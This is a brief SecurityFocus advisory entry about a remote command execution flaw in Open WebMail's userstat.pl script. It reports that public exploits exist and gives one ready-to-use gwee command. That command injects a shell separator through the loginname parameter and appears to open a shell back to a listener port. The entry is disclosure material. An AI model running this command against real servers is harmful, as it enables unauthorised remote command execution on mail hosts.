Open WebMail Remote Command Execution Variant Vulnerability

There is no exploit required. However it is reported that several exploits are in public circulation, additionally it has been demonstrated that 'gwee' (http://cycom.se/dl/gwee), can be used as follows to exploit the issue:
$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl


 

Privacy Statement
Copyright 2010, SecurityFocus